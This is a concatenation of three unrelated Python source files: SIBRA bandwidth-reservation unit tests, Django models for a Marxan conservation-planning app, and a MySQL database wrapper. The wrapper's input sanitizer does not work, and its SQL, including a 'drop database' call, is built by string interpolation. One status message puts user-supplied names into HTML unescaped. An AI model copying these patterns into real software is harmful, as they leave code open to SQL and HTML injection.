return_value=None)
def test_in_use(self, super_init, logging, bwsnap):
inst = ReservationBaseTesting("path id", "owner", "parent")
inst.idxes = [0, 2, 7]
# Call
ntools.eq_(inst.add(2, "bwsnap", 43, 42), bwsnap.return_value)
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
return_value=None)
def test_too_large(self, super_init):
inst = ReservationBaseTesting("path id", "owner", "parent")
bw_avail = create_mock(["__add__", "min"])
bw_avail.__add__.return_value = bw_avail
inst.parent = create_mock(["bw_avail"])
inst.parent.bw_avail.return_value = bw_avail
inst.resvs = [8]
bwsnap = create_mock(["slte"])
bwsnap.slte.return_value = False
# Call
ntools.eq_(inst.add(2, bwsnap, 43, 42), bw_avail.min.return_value)
# Tests
bw_avail.__add__.assert_called_once_with(8)
bwsnap.slte.assert_called_once_with(bw_avail)
bw_avail.min.assert_called_once_with(bwsnap)
@patch("lib.sibra.state.reservation.ReservationIndex", autospec=True)
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
return_value=None)
def test_success(self, super_init, resv_idx):
inst = ReservationBaseTesting("path id", "owner", "parent")
inst.parent = create_mock(["bw_avail"])
inst.parent.bw_avail.return_value = 8
inst.resvs = [8]
inst._update = create_mock()
bwsnap = create_mock(["slte"])
# Call
ntools.eq_(inst.add(2, bwsnap, 43, 42), bwsnap)
# Tests
resv_idx.assert_called_once_with(2, bwsnap, 43)
ntools.eq_(inst.idxes, {2: resv_idx.return_value})
ntools.eq_(inst.order, [2])
inst._update.assert_called_once_with(42)
class TestReservationBaseUpdate(object):
"""
Unit tests for lib.sibra.state.reservation.ReservationBase._update
Note: these tests do not mock out BWSnapshot, as it would make testing too
complex to be useful.
"""
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
return_value=None)
def _check(self, old_resvs, resvs, updates, super_init):
inst = ReservationBaseTesting("path id", "owner", "parent")
inst.parent = create_mock(["update"])
inst.resvs = []
for bw in old_resvs:
inst.resvs.append(BWSnapshot(bw * 1024, bw * 1024))
for idx, exp_tick, bw in resvs:
inst.order.append(idx)
resv = create_mock(["bwsnap", "exp_tick"])
resv.bwsnap = BWSnapshot(bw * 1024, bw * 1024)
resv.exp_tick = exp_tick
inst.idxes[idx] = resv
# Call
inst._update(0)
# Tests
if not updates:
ntools.eq_(inst.parent.update.called, False)
return
parent_updates = []
for idx, bw in updates:
parent_updates.append((idx, BWSnapshot(bw * 1024, bw * 1024)))
inst.parent.update.assert_called_once_with(parent_updates)
def test_no_change(self):
# 0: 40, 40, 40, 0...
# 7: 20, 20, 20, 20, 0...
# 4: 50, 50, 0...
resvs = [(0, 2, 40), (7, 3, 20), (4, 1, 50)]
old_resvs = [50, 0, -10, -20, -20]
self._check(old_resvs, resvs, [])
def test_update(self):
# 0: 30, 30, 30, 0...
# 7: 10, 10, 10, 10, 10, 10, 0...
# 4: 40, 0...
resvs = [(0, 2, 30), (7, 5, 10), (4, 0, 40)]
old_resvs = [50, 0, -10, -20, 0, 0, -20]
update = [(0, -10), (1, -10), (2, +10), (6, 10)]
self._check(old_resvs, resvs, update)
class TestReservationBaseNext(object):
"""
Unit tests for lib.sibra.state.reservation.ReservationBase.next
"""
@patch("lib.sibra.state.reservation.BWSnapshot", autospec=True)
@patch("lib.sibra.state.reservation.BandwidthBase.next", autospec=True)
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
return_value=None)
def test(self, super_init, super_next, bwsnap):
inst = ReservationBaseTesting("path id", "owner", "parent")
inst._rollover = create_mock()
inst._expire = create_mock()
inst.resvs = ["new max bw"]
for i in range(3):
resv = create_mock(["exp_tick"])
resv.exp_tick = 9 + i
inst.idxes[i] = resv
# Call
inst.next(10)
# Tests
super_next.assert_called_once_with(inst)
inst._rollover.assert_called_once_with(inst.child_resvs)
ntools.eq_(inst.max_bw, "new max bw")
ntools.eq_(inst.child_used, bwsnap.return_value)
inst._expire.assert_called_once_with([0], 10)
class TestReservationBaseUse(object):
"""
Unit tests for lib.sibra.state.reservation.ReservationBase.use
"""
@patch("lib.sibra.state.reservation.BandwidthBase.__init__", autospec=True,
return_value=None)
def test(self, super_init):
inst = ReservationBaseTesting("path id", "owner", "parent")
inst.curr_used = 0
inst._expire = create_mock()
inst.order = [6, 7, 9, 0, 2, 4]
# Call
ntools.ok_(inst.use(0, 42, 11))
# Tests
ntools.eq_(inst.curr_used, 42)
inst._expire.assert_called_once_with([6, 7, 9], 11)
class TestSteadyReservationUpdate(object):
"""
Unit tests for lib.sibra.state.reservation.SteadyReservation.update
Note: these tests do not mock out BWSnapshot, as it would make testing too
complex to be useful.
"""
def test(self):
inst = SteadyReservation("owner", BWSnapshot(100, 100), "parent")
inst.max_bw = BWSnapshot(100, 100)
for i, bw in enumerate([50, 0, -10, -20, 0, 0, -20]):
inst.child_resvs[i] = BWSnapshot(bw, bw)
updates = []
for idx, bw in [(0, -10), (1, -10), (2, +10), (6, 10)]:
updates.append((idx, BWSnapshot(bw, bw)))
# Call
inst.update(updates)
# Tests
for i, bw in enumerate([40, -10, 0, -20, 0, 0, -10]):
tick = BWSnapshot(bw, bw)
ntools.eq_(inst.child_resvs[i], tick)
if __name__ == "__main__":
nose.run(defaultTest=__name__)
|
|
import os
import glob
import shutil
from django.conf import settings
from django.contrib.gis.db import models
from django.core.cache import cache
from django.template.defaultfilters import slugify
from django.utils.html import escape
from django.db.models.signals import post_delete
from django.dispatch.dispatcher import receiver
from madrona.features import register, alternate
from madrona.features.models import FeatureCollection
from madrona.unit_converter.models import area_in_display_units
from madrona.analysistools.models import Analysis
from madrona.common.utils import asKml
from madrona.async.ProcessHandler import process_is_running, process_is_complete, \
process_is_pending, get_process_result, process_is_complete, check_status_or_begin
from madrona.common.utils import get_logger
from seak.tasks import marxan_start
from django.core.serializers.json import DjangoJSONEncoder
from django.utils import simplejson as json
from madrona.common.models import KmlCache
from seak.jenks import get_jenks_breaks
logger = get_logger()
def cachemethod(cache_key, timeout=3600):
'''
http://djangosnippets.org/snippets/1130/
Cacheable class method decorator
from madrona.common.utils import cachemethod
@property
@cachemethod("SomeClass_get_some_result_%(id)s")
'''
def paramed_decorator(func):
def decorated(self):
if not settings.USE_CACHE:
res = func(self)
return res
key = cache_key % self.__dict__
#logger.debug("\nCACHING %s" % key)
res = cache.get(key)
if res == None:
#logger.debug(" Cache MISS")
res = func(self)
cache.set(key, res, timeout)
#logger.debug(" Cache SET")
if cache.get(key) != res:
logger.error("*** Cache GET was NOT successful, %s" % key)
return res
return decorated
return paramed_decorator
class JSONField(models.TextField):
"""JSONField is a generic textfield that neatly serializes/unserializes
JSON objects seamlessly"""
# Used so to_python() is called
__metaclass__ = models.SubfieldBase
def to_python(self, value):
"""Convert our string value to JSON after we load it from the DB"""
if value == "":
return None
# Actually we'll just return the string
# need to explicitly call json.loads(X) in your code
# reason: converting to dict then repr that dict in a form is invalid json
# i.e. {"test": 0.5} becomes {u'test': 0.5} (not unicode and single quotes)
return value
def get_db_prep_save(self, value, *args, **kwargs):
"""Convert our JSON object to a string before we save"""
if value == "":
return None
if isinstance(value, dict):
value = json.dumps(value, cls=DjangoJSONEncoder)
return super(JSONField, self).get_db_prep_save(value, *args, **kwargs)
# http://south.readthedocs.org/en/latest/customfields.html#extending-introspection
from south.modelsinspector import add_introspection_rules
add_introspection_rules([], ["^seak\.models\.JSONField"])
class ConservationFeature(models.Model):
'''
Django model representing Conservation Features (typically species)
'''
name = models.CharField(max_length=99)
level1 = models.CharField(max_length=99)
level2 = models.CharField(max_length=99, null=True, blank=True)
level3 = models.CharField(max_length=99, null=True, blank=True)
level4 = models.CharField(max_length=99, null=True, blank=True)
level5 = models.CharField(max_length=99, null=True, blank=True)
dbf_fieldname = models.CharField(max_length=15, null=True, blank=True)
units = models.CharField(max_length=90, null=True, blank=True)
uid = models.IntegerField(primary_key=True)
@property
def level_string(self):
""" All levels concatenated with --- delim """
levels = [self.level1, self.level2, self.level3, self.level4, self.level5]
return '---'.join([slugify(x.lower()) for x in levels])
@property
def id_string(self):
""" Relevant levels concatenated with --- delim """
levels = [self.level1, self.level2, self.level3, self.level4, self.level5]
return '---'.join([slugify(x.lower()) for x in levels if x not in ['', None]])
def __unicode__(self):
return u'%s' % self.name
class Cost(models.Model):
'''
Django model representing Costs (typically planning unit metrics which are considered
"costly")
'''
name = models.CharField(max_length=99)
uid = models.IntegerField(primary_key=True)
dbf_fieldname = models.CharField(max_length=15, null=True, blank=True)
units = models.CharField(max_length=16, null=True, blank=True)
desc = models.TextField()
@property
def slug(self):
return slugify(self.name.lower())
def __unicode__(self):
return u'%s' % self.name
class PlanningUnit(models.Model):
'''
Django model representing polygon planning units
'''
fid = models.IntegerField(primary_key=True)
name = models.CharField(max_length=99)
geometry = models.MultiPolygonField(srid=settings.GEOMETRY_DB_SRID,
null=True, blank=True, verbose_name="Planning Unit Geometry")
objects = models.GeoManager()
date_modified = models.DateTimeField(auto_now=True)
@property
@cachemethod("PlanningUnit_%(fid)s_area")
def area(self):
# TODO don't assume storing meters and returning km^2
area = self.geometry.area / float(1000*1000)
return area
@property
@cachemethod("PlanningUnit_%(fid)s_centroid")
def centroid(self):
centroid = self.geometry.point_on_surface.coords
return centroid
def __unicode__(self):
return u'%s' % self.name
@property
@cachemethod("PlanningUnit_%(fid)s_cffields")
def conservation_feature_fields(self):
cfs = PuVsCf.objects.filter(pu=self, amount__isnull=False).select_related()
return [x.cf.dbf_fieldname for x in cfs]
@property
@cachemethod("PlanningUnit_%(fid)s_costfields")
def cost_fields(self):
cfs = PuVsCost.objects.filter(pu=self, amount__isnull=False).select_related()
return [x.cost.dbf_fieldname for x in cfs]
class DefinedGeography(models.Model):
'''
A subset of planning units that can be refered to by name
'''
name = models.CharField(max_length=99)
planning_units = models.ManyToManyField(PlanningUnit)
@property
def planning_unit_fids(self):
return json.dumps([x.fid for x in self.planning_units.all()])
@property
def slug(self):
return slugify(self.name)
def __unicode__(self):
return self.name
class PuVsCf(models.Model):
'''
The conservation feature value per planning unit
'''
pu = models.ForeignKey(PlanningUnit)
cf = models.ForeignKey(ConservationFeature)
amount = models.FloatField(null=True, blank=True)
class Meta:
unique_together = ("pu", "cf")
class PuVsCost(models.Model):
'''
The cost feature value per planning unit
'''
pu = models.ForeignKey(PlanningUnit)
cost = models.ForeignKey(Cost)
amount = models.FloatField(null=True, blank=True)
class Meta:
unique_together = ("pu", "cost")
def scale_list(vals, floor=None):
"""
If floor is None, Scales a list of floats linearly between 100*min/max and 100
Otherwise, scales a list of floats linearly between floor and 100
"""
if len(vals) < 1:
return []
nonull_vals = []
for v in vals:
if v:
nonull_vals.append(v)
else:
logger.error("WARNING: null value enountered in a scaled list: assuming zero!")
nonull_vals.append(0)
minval = min(nonull_vals)
maxval = max(nonull_vals)
high = 100.0
if floor is None:
try:
low = 100.0 * float(minval)/maxval
except ZeroDivisionError:
low = 0
else:
low = floor
if maxval == minval:
return [0] * len(vals)
scaled = [high - (z / float(maxval - minval)) for z in
[(high - low) * y for y in
[maxval - x for x in nonull_vals]]]
return scaled
@register
class Scenario(Analysis):
'''
Madrona feature for prioritization scenario
'''
input_targets = JSONField(verbose_name='Target Percentage of Habitat')
input_penalties = JSONField(verbose_name='Penalties for Missing Targets')
input_relativecosts = JSONField(verbose_name='Relative Costs')
input_geography = JSONField(verbose_name='Input Geography fids')
input_scalefactor = models.FloatField(default=0.0)
description = models.TextField(default="", null=True, blank=True, verbose_name="Description/Notes")
# All output fields should be allowed to be Null/Blank
output_best = JSONField(null=True, blank=True, verbose_name="Watersheds in Optimal Reserve")
output_pu_count = JSONField(null=True, blank=True)
@property
def outdir(self):
return os.path.realpath(os.path.join(settings.MARXAN_OUTDIR, "%s_" % (self.uid,) ))
# This is not asycn-safe! A new modificaiton will clobber the old.
# What happens if new and old are both still running - small chance of a corrupted mix of output files?
@property
def expired(self):
if self.date_modified < PlanningUnit.objects.latest('date_modified').date_modified:
return True
else:
return False
def copy(self, user):
""" Override the copy method to make sure the marxan files get copied """
orig = self.outdir
copy = super(Scenario, self).copy(user)
shutil.copytree(orig, copy.outdir, symlinks=True)
copy.save(rerun=False)
return copy
def process_dict(self, d):
"""
Use the levels in the ConservationFeature table to determine the
per-species value based on the specified levels.
Input:
{
'widespread---trout': 0.5,
'widespread---lamprey': 0.4,
'widespread---salmon': 0.3,
'widespread---steelhead': 0.2,
'locally endemic': 0.1,
}
Return:
species pk is the key
{ 1: 0.5, 2: 0.5, ......}
"""
ndict = {}
for cf in ConservationFeature.objects.all():
# TODO don't assume fields are valid within the selected geography
levels = cf.level_string
val = 0
for k, v in d.items():
if levels.startswith(k.lower()):
val = v
break
ndict[cf.pk] = val
return ndict
def invalidate_cache(self):
'''
Remove any cached values associated with this scenario.
Warning: additional caches will need to be added to this method
'''
keys = ["%s_results",]
keys = [x % self.uid for x in keys]
cache.delete_many(keys)
for key in keys:
assert cache.get(key) == None
logger.debug("invalidated cache for %s" % str(keys))
return True
def run(self):
'''
Fire off the marxan analysis
'''
from seak.marxan import MarxanAnalysis
self.invalidate_cache()
# create the target and penalties
logger.debug("Create targets and penalties")
targets = self.process_dict(json.loads(self.input_targets))
penalties = self.process_dict(json.loads(self.input_penalties))
cost_weights = json.loads(self.input_relativecosts)
geography_fids = json.loads(self.input_geography)
assert len(targets.keys()) == len(penalties.keys()) #== len(ConservationFeature.objects.all())
assert max(targets.values()) <= 1.0
assert min(targets.values()) >= 0.0
nonzero_pks = [k for k, v in targets.items() if v > 0]
nonzero_targets = []
nonzero_penalties = []
for nz in nonzero_pks:
nonzero_targets.append(targets[nz])
nonzero_penalties.append(penalties[nz])
maxtarget = max(nonzero_targets)
avgtarget = float(sum(nonzero_targets))/float(len(nonzero_targets))
# ignore input, choose a scalefactor automatically based on avg and max target
self.input_scalefactor = 0.5 + (avgtarget * 2) + (maxtarget * 2)
# Apply the target and penalties
logger.debug("Apply the targets and penalties")
cfs = []
pus = PlanningUnit.objects.filter(fid__in=geography_fids)
for cf in ConservationFeature.objects.all():
total = sum([x.amount for x in cf.puvscf_set.filter(pu__in=pus) if x.amount])
target_prop = targets[cf.pk]
# only take 99.9% at most to avoid rounding errors
# which lead Marxan to believe that the target is unreachable
if target_prop >= 0.999:
target_prop = 0.999
target = total * target_prop
penalty = penalties[cf.pk] * self.input_scalefactor
# MUST include all species even if they are zero
cfs.append((cf.pk, target, penalty, cf.name))
final_cost_weights = {}
for cost in Cost.objects.all():
costkey = cost.slug
try:
final_cost_weights[costkey] = cost_weights[costkey]
except KeyError:
final_cost_weights[costkey] = 0
raw_costs = {}
pus = []
for pu in PlanningUnit.objects.filter(fid__in=geography_fids):
puc = PuVsCost.objects.filter(pu=pu)
for c in puc:
costkey = c.cost.slug
if costkey not in raw_costs.keys():
raw_costs[costkey] = []
raw_costs[costkey].append(c.amount)
pus.append(pu.pk)
# scale, weight and combine costs
weighted_costs = {}
for costkey, costs in raw_costs.iteritems():
if None in costs:
print "Warning: skipping ", costkey, "; contains nulls in this geography"
continue
weighted_costs[costkey] = [x * final_cost_weights[costkey] for x in scale_list(costs)]
final_costs = [sum(x) for x in zip(*weighted_costs.values())]
final_costs = [1.0 if x < 1.0 else x for x in final_costs] # enforce a minimum cost of 1.0
pucosts = zip(pus, final_costs)
logger.debug("Creating the MarxanAnalysis object")
m = MarxanAnalysis(pucosts, cfs, self.outdir)
logger.debug("Firing off the process")
check_status_or_begin(marxan_start, task_args=(m,), polling_url=self.get_absolute_url())
self.process_results()
return True
@property
def numreps(self):
try:
with open(os.path.join(self.outdir,"input.dat")) as fh:
for line in fh.readlines():
if line.startswith('NUMREPS'):
return int(line.strip().replace("NUMREPS ",""))
except IOError:
# probably hasn't started processing yet
return settings.MARXAN_NUMREPS
@property
def progress(self):
path = os.path.join(self.outdir, "output", "nplcc_r*.csv")
outputs = glob.glob(path)
numreps = self.numreps
if len(outputs) == numreps:
if not self.done:
return (0, numreps)
return (len(outputs), numreps)
def geojson(self, srid):
# Note: no reprojection support here
rs = self.results
if 'units' in rs:
selected_fids = [r['fid'] for r in rs['units']]
else:
selected_fids = []
if 'bbox' in rs:
bbox = rs['bbox']
else:
bbox = None
fullname = self.user.get_full_name()
if fullname == '':
fullname = self.user.username
error = False
if self.status_code == 0:
error = True
serializable = {
"type": "Feature",
"bbox": bbox,
"geometry": None,
"properties": {
'uid': self.uid,
'bbox': bbox,
'name': self.name,
'done': self.done,
'error': error,
'sharing_groups': [x.name for x in self.sharing_groups.all()],
'expired': self.expired,
'description': self.description,
'date_modified': self.date_modified.strftime("%m/%d/%y %I:%M%P"),
'user': self.user.username,
'user_fullname': fullname,
'selected_fids': selected_fids,
'potential_fids': json.loads(self.input_geography)
}
}
return json.dumps(serializable)
@property
@cachemethod("seak_scenario_%(id)s_results")
def results(self):
targets = json.loads(self.input_targets)
penalties = json.loads(self.input_penalties)
cost_weights = json.loads(self.input_relativecosts)
geography = json.loads(self.input_geography)
targets_penalties = {}
for k, v in targets.items():
targets_penalties[k] = {'label': k.replace('---', ' > ').replace('-',' ').title(), 'target': v, 'penalty': None}
for k, v in penalties.items():
try:
targets_penalties[k]['penalty'] = v
except KeyError:
# this should never happen but just in case
targets_penalties[k] = {'label': k.replace('---', ' > ').title(), 'target': None, 'penalty': v}
species_level_targets = self.process_dict(targets)
if not self.done:
return {'targets_penalties': targets_penalties, 'costs': cost_weights}
bestjson = json.loads(self.output_best)
bestpks = [int(x) for x in bestjson['best']]
bestpus = PlanningUnit.objects.filter(pk__in=bestpks).order_by('name')
potentialpus = PlanningUnit.objects.filter(fid__in=geography)
bbox = None
if bestpus:
bbox = potentialpus.extent()
best = []
logger.debug("looping through bestpus queryset")
scaled_costs = {}
all_costs = Cost.objects.all()
scaled_breaks = {}
for costslug, weight in cost_weights.iteritems():
if weight <= 0:
continue
try:
cost = [x for x in all_costs if x.slug == costslug][0]
except IndexError:
continue
all_selected = PuVsCost.objects.filter(cost=cost, pu__in=bestpus)
all_potential = PuVsCost.objects.filter(cost=cost, pu__in=potentialpus)
vals = [x.amount for x in all_potential]
fids = [x.pu.fid for x in all_potential]
fids_selected = [x.pu.fid for x in all_selected]
scaled_values = [int(x) for x in scale_list(vals, floor=0.0)]
pucosts_potential = dict(zip(fids, scaled_values))
extract = lambda x, y: dict(zip(x, map(y.get, x)))
pucosts = extract(fids_selected, pucosts_potential)
scaled_costs[costslug] = pucosts
scaled_breaks[costslug] = get_jenks_breaks(scaled_values, 3)
print
print scaled_breaks
print
for pu in bestpus:
centroid = pu.centroid
costs = {}
costs_class = {}
for cname, pucosts in scaled_costs.iteritems():
thecost = pucosts[pu.fid]
breaks = scaled_breaks[cname]
costs[cname] = thecost
# classify the costs into categories
if thecost <= breaks[1]:
costs_class[cname] = 'low'
elif thecost > breaks[2]:
costs_class[cname] = 'high'
else:
costs_class[cname] = 'med'
print
print pu
print costs
print costs_class
print
best.append({'name': pu.name,
'fid': pu.fid,
'costs': costs,
'costs_class': costs_class,
'centroidx': centroid[0],
'centroidy': centroid[1]})
sum_area = sum([x.area for x in bestpus])
# Parse mvbest
fh = open(os.path.join(self.outdir, "output", "nplcc_mvbest.csv"), 'r')
lines = [x.strip().split(',') for x in fh.readlines()[1:]]
fh.close()
species = []
num_target_species = 0
num_met = 0
for line in lines:
sid = int(line[0])
try:
consfeat = ConservationFeature.objects.get(pk=sid)
except ConservationFeature.DoesNotExist:
logger.error("ConservationFeature %s doesn't exist; refers to an old scenario?" % sid)
continue
sname = consfeat.name
sunits = consfeat.units
slevel1 = consfeat.level1
scode = consfeat.dbf_fieldname
starget = float(line[2])
try:
starget_prop = species_level_targets[consfeat.pk]
except KeyError:
continue
sheld = float(line[3])
try:
stotal = float(starget/starget_prop)
spcttotal = sheld/stotal
except ZeroDivisionError:
stotal = 0
spcttotal = 0
smpm = float(line[9])
if starget == 0:
smpm = 0.0
smet = False
if line[8] == 'yes' or smpm > 1.0:
smet = True
num_met += 1
s = {'name': sname, 'id': sid, 'target': starget, 'units': sunits, 'code': scode,
'held': sheld, 'met': smet, 'pct_target': smpm, 'level1': slevel1,
'pcttotal': spcttotal, 'target_prop': starget_prop }
species.append(s)
if starget > 0:
num_target_species += 1
species.sort(key=lambda k:k['name'].lower())
costs = {}
for k,v in cost_weights.iteritems():
name = k.replace("-", " ").title()
costs[name] = v
res = {
'costs': costs, #cost_weights
'geography': geography,
'targets_penalties': targets_penalties,
'area': sum_area,
'num_units': len(best),
'num_met': num_met,
'num_species': num_target_species, #len(species),
'units': best,
'species': species,
'bbox': bbox,
}
return res
@property
def status_html(self):
return self.status[1]
@property
def status_code(self):
return self.status[0]
@property
def status(self):
url = self.get_absolute_url()
if process_is_running(url):
status = """Analysis for <em>%s</em> is currently running.""" % (self.name,)
code = 2
elif process_is_complete(url):
status = "%s processing is done." % self.name
code = 3
elif process_is_pending(url):
status = "%s is in the queue but not yet running." % self.name
res = get_process_result(url)
code = 1
if res is not None:
status += ".. "
status += str(res)
else:
status = "An error occured while running this analysis."
code = 0
res = get_process_result(url)
if res is not None:
status += "..<br/> "
status += str(res)
status += "<br/>Please edit the scenario and try again. If the problem persists, please contact us."
return (code, "<p>%s</p>" % status)
def process_results(self):
if process_is_complete(self.get_absolute_url()):
chosen = get_process_result(self.get_absolute_url())
wshds = PlanningUnit.objects.filter(pk__in=chosen)
self.output_best = json.dumps({'best': [str(x.pk) for x in wshds]})
ssoln = [x.strip().split(',') for x in
open(os.path.join(self.outdir,"output","nplcc_ssoln.csv"),'r').readlines()][1:]
selected = {}
for s in ssoln:
num = int(s[1])
if num > 0:
selected[int(s[0])] = num
self.output_pu_count = json.dumps(selected)
super(Analysis, self).save() # save without calling save()
self.invalidate_cache()
@property
def done(self):
""" Boolean; is process complete? """
done = True
if self.output_best is None:
done = False
if self.output_pu_count is None:
done = False
if not done:
done = True
# only process async results if output fields are blank
# this means we have to recheck after running
self.process_results()
if self.output_best is None:
done = False
if self.output_pu_count is None:
done = False
return done
@classmethod
def mapnik_geomfield(self):
return "output_geometry"
@property
def color(self):
# colors are ABGR
colors = [
'aa0000ff',
'aaff0000',
'aa00ffff',
'aaff00ff',
]
return colors[self.pk % len(colors)]
@property
def kml_done(self):
key = "watershed_kmldone_%s_%s" % (self.uid, slugify(self.date_modified))
kmlcache, created = KmlCache.objects.get_or_create(key=key)
kml = kmlcache.kml_text
if not created and kml:
logger.warn("%s ... kml cache found" % key)
return kml
logger.warn("%s ... NO kml cache found ... seeding" % key)
ob = json.loads(self.output_best)
wids = [int(x.strip()) for x in ob['best']]
puc = json.loads(self.output_pu_count)
method = "best"
#method = "all"
if method == "best":
wshds = PlanningUnit.objects.filter(pk__in=wids)
elif method == "all":
wshds = PlanningUnit.objects.all()
kmls = []
color = self.color
#color = "cc%02X%02X%02X" % (random.randint(0,255),random.randint(0,255),random.randint(0,255))
for ws in wshds:
try:
hits = puc[str(ws.pk)]
except KeyError:
hits = 0
if method == "all":
numruns = settings.MARXAN_NUMREPS
prop = float(hits)/numruns
scale = (1.4 * prop * prop)
if scale > 0 and scale < 0.5:
scale = 0.5
desc = "<description>Included in %s out of %s runs.</description>" % (hits, numruns)
else:
prop = 1.0
scale = 1.2
desc = ""
if prop > 0:
kmls.append( """
<Style id="style_%s">
<IconStyle>
<color>%s</color>
<scale>%s</scale>
<Icon>
<href>http://maps.google.com/mapfiles/kml/shapes/shaded_dot.png</href>
</Icon>
</IconStyle>
<LabelStyle>
<color>0000ffaa</color>
<scale>0.1</scale>
</LabelStyle>
</Style>
<Placemark id="huc_%s">
<visibility>1</visibility>
<name>%s</name>
%s
<styleUrl>style_%s</styleUrl>
%s
</Placemark>
""" % (ws.fid, color, scale, ws.fid, ws.name, desc, ws.fid, asKml(ws.geometry.point_on_surface)))
fullkml = """%s
<Folder id='%s'>
<name>%s</name>
%s
</Folder>""" % (self.kml_style,
self.uid,
escape(self.name),
'\n'.join(kmls))
kmlcache.kml_text = fullkml
kmlcache.save()
return fullkml
@property
def kml_working(self):
code = self.status_code
if code == 3:
txt = "completed"
elif code == 2:
txt = "in progress"
elif code == 1:
txt = "in queue"
elif code == 0:
txt = "error occured"
else:
txt = "status unknown"
return """
<Placemark id="%s">
<visibility>0</visibility>
<name>%s (%s)</name>
</Placemark>
""" % (self.uid, escape(self.name), txt)
@property
def kml_style(self):
return """
<Style id="selected-watersheds">
<IconStyle>
<color>ffffffff</color>
<colorMode>normal</colorMode>
<scale>0.9</scale>
<Icon> <href>http://maps.google.com/mapfiles/kml/paddle/wht-blank.png</href> </Icon>
</IconStyle>
<LabelStyle>
<color>ffffffff</color>
<scale>0.8</scale>
</LabelStyle>
<PolyStyle>
<color>7766ffff</color>
</PolyStyle>
</Style>
"""
class Options:
form = 'seak.forms.ScenarioForm'
verbose_name = 'Prioritization Scenario'
show_template = 'nplcc/show.html'
form_template = 'nplcc/form.html'
form_context = {
'cfs': ConservationFeature.objects.all().order_by('level1'),
'defined_geographies': DefinedGeography.objects.all(),
'costs': Cost.objects.all(),
}
icon_url = 'common/images/watershed.png'
links = (
alternate('Shapefile',
'seak.views.watershed_shapefile',
select='single multiple',
type='application/zip',
),
alternate('Input Files',
'seak.views.watershed_marxan',
select='single',
type='application/zip',
),
)
# Post-delete hooks to remove the marxan files
@receiver(post_delete, sender=Scenario)
def _scenario_delete(sender, instance, **kwargs):
if os.path.exists(instance.outdir):
try:
shutil.rmtree(instance.outdir)
logger.debug("Deleting %s at %s" % (instance.uid, instance.outdir))
except OSError:
logger.debug("Can't deleting %s; forging ahead anyway..." % (instance.uid,))
@register
class Folder(FeatureCollection):
description = models.TextField(default="", null=True, blank=True)
class Options:
verbose_name = 'Folder'
valid_children = (
'seak.models.Folder',
'seak.models.Scenario',
)
form = 'seak.forms.FolderForm'
show_template = 'folder/show.html'
icon_url = 'common/images/folder.png'
class PlanningUnitShapes(models.Model):
pu = models.ForeignKey(PlanningUnit)
stamp = models.FloatField()
bests = models.IntegerField(default=0)
hits = models.IntegerField(default=0)
fid = models.IntegerField(null=True)
name = models.CharField(max_length=99, null=True)
geometry = models.MultiPolygonField(srid=settings.GEOMETRY_DB_SRID,
null=True, blank=True, verbose_name="Planning Unit Geometry")
|
|
import MySQLdb
from cxparams import CXParams as CXP
import time
import functools
import array
import sys
import pdb
import cPickle
import re
# Credit here to M. Newville (GSECARS) for SimpleTable and SimpleDB
def clean_input(x, maxlen=None):
"""clean input, forcing it to be a string, with comments stripped,
and guarding against extra sql statements"""
if not isinstance(x, (unicode, str)):
x = str(x)
if maxlen is None:
maxlen = 1024
if len(x) > maxlen:
x = x[:maxlen-1]
x.replace('#', '\#')
eol = x.find(';')
if eol > -1:
x = x[:eol]
return x.strip()
class SimpleDB:
def __init__(self, user=CXP.db.dbuser, dbname=CXP.db.dbname, passwd=CXP.db.dbpass, host=CXP.db.dbhost,
autocommit=1):
self.conn = MySQLdb.connect(user=user, db=dbname, passwd=passwd, host=host)
self.cursor = self.conn.cursor(cursorclass=MySQLdb.cursors.DictCursor)
self.set_autocommit(autocommit)
self.dbname = dbname
self.tables = []
self.read_table_info()
def __repr__(self):
return "<SimpleDB name=%s>" % (self.dbname)
def set_autocommit(self, commit=1):
self.cursor.execute("set AUTOCOMMIT=%i" % commit)
def _normalize_dict(self, indict):
""" internal 'normalization' of query outputs,
converting unicode to str and array data to lists"""
t = {}
if (indict == None):
return t
for k, v in indict.items():
key = k.lower()
val = v
if isinstance(v, array.array):
if v.typecode == 'c':
val = v.tostring()
else:
val = v.tolist()
elif isinstance(v, unicode):
val = str(v)
t[key] = val
return t
def get_cursor(self, dbconn=None):
" get a DB cursor, possibly getting a new one from the Connection pool"
if self.conn is not None:
if self.cursor is None:
self.cursor = self.conn.cursor
return self.cursor
if self.conn is None:
CXP.log("Could not start MySQL on %s for database %s" %
(self.host, self.dbname), status='fatal')
raise IOError("no database connection to %s" % self.dbname)
def close(self):
self.conn.close()
def use(self, dbname):
self.execute("use %s" % dbname)
def read_table_info(self):
" use database, populate initial list of tables "
self.table_list = []
self.tables = {}
x = self.exec_fetch("show TABLES")
self.table_list = [i.values()[0] for i in x]
for i in self.table_list:
self.tables[i] = SimpleTable(i, db=self)
def __execute(self, q):
"""internal execution of a single query -- needs a valid cursor!"""
if self.cursor is None:
print "SimpleDB.__execute -- no cursor: {}".format(q)
sys.exit(1)
n = 0
while n < 50:
n = n + 1
try:
return self.cursor.execute(q)
except:
time.sleep(0.010)
print "Query Failed: {} ".format(q)
return None
def execute(self, q):
"execute a single sql command string or a tuple or list command strings"
ret = None
if isinstance(q, str):
ret = self.__execute(q)
elif isinstance(q, (list, tuple)):
ret = [self.__execute(i) for i in q]
else:
self.write("Error: could not execute %s" % str(q))
return ret
def exec_fetch(self, q):
"execute + fetchall"
self.get_cursor()
self.__execute(q)
ret = self.fetchall()
return ret
def source_file(self, file=None, report=100):
""" execute a file of sql commands """
try:
f = open(file)
lines = f.readlines()
count = 0
cmds = []
for x in lines:
if not x.startswith('#'):
x = x[:-1].strip()
if x.endswith(';'):
cmds.append(x[:-1])
sql = "".join(cmds)
self.__execute(sql)
cmds = []
else:
cmds.append(x)
count = count +1
if (report>0 and (count % report == 0)):
print "{:d}} / {:d} ".format(count, len(lines))
f.close()
except:
print "Could not source source_file {}".format(file)
def create_and_use(self, dbname):
"create and use a database. Use with caution!"
self.__execute("drop database if exists %s" % dbname)
self.__execute("create database %s" % dbname)
self.use(dbname)
def fetchall(self):
"return all rows from most recent query -- needs valid cursor"
if self.cursor is None:
return ()
r = [self._normalize_dict(i) for i in self.cursor.fetchall()]
return tuple(r)
def exec_fetchone(self, q):
" execute + fetchone"
self.__execute(q)
ret = self.fetchone()
return ret
def fetchone(self):
"return next row from most recent query -- needs valid cursor"
